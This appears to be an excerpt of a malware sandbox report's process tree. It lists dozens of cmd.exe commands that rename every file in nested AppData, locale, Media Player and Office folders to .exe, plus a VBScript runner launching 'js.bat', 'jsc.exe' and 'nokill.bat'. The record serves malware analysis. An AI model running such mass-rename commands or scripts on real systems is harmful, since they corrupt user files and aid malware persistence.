          • cmd.exe (PID: 7296 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-CA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7936 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-CD\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7056 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-CH\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7400 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-CI\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1268 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-CM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1900 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-FR\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2680 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-HT\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7948 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-LU\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7876 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-MA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5564 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-MC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6576 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-ML\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-RE\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5160 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-SN\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1052 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\gl-ES\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2036 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ha-Latn-NG\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8052 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\he-IL\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5836 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\hi-IN\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6148 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\hr-BA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1856 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\hr-HR\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\hu-HU\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5784 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\hy-AM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5396 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\id-ID\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3280 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\it-CH\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1896 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\it-IT\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7100 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ka-GE\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\kk-KZ\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\lt-LT\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6492 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\lv-LV\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6048 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\mk-MK\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2128 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ms-BN\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7928 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ms-MY\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\nb-NO\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5544 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\nl-BE\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1412 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\nl-NL\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5328 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\pl-PL\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7664 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\pt-BR\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\pt-PT\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7388 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ro-MD\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7252 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ro-RO\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6596 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ru-RU\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6788 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sk-SK\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1496 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sl-SI\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6180 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sq-AL\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2928 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sr-Cyrl-BA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7528 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sr-Cyrl-ME\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3976 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sr-Cyrl-RS\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sr-Latn-BA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5012 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sr-Latn-ME\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7328 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sr-Latn-RS\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2680 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sv-FI\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5744 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\sv-SE\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7876 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\tr-TR\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5564 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\uk-UA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\uz-Latn-UZ\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4768 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6820 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Transcoded Files Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2036 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7972 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\Features\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2296 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1856 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\SDX\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7312 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\DTS\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5784 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\excel.exe_Rules\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\Floodgate\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officec2rclient.exe_Rules\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 3588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 5952 cmdline: "C:\Windows\system32\wscript.exe" "C:\bug32\runner.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c ""C:\BUG32\js.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • jsc.exe (PID: 7408 cmdline: "C:\BUG32\jsc.exe" MD5: 367B7179319F010F84B37ACFC65082BA)
    • cmd.exe (PID: 904 cmdline: C:\Windows\system32\cmd.exe /c ""C:\BUG32\nokill.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
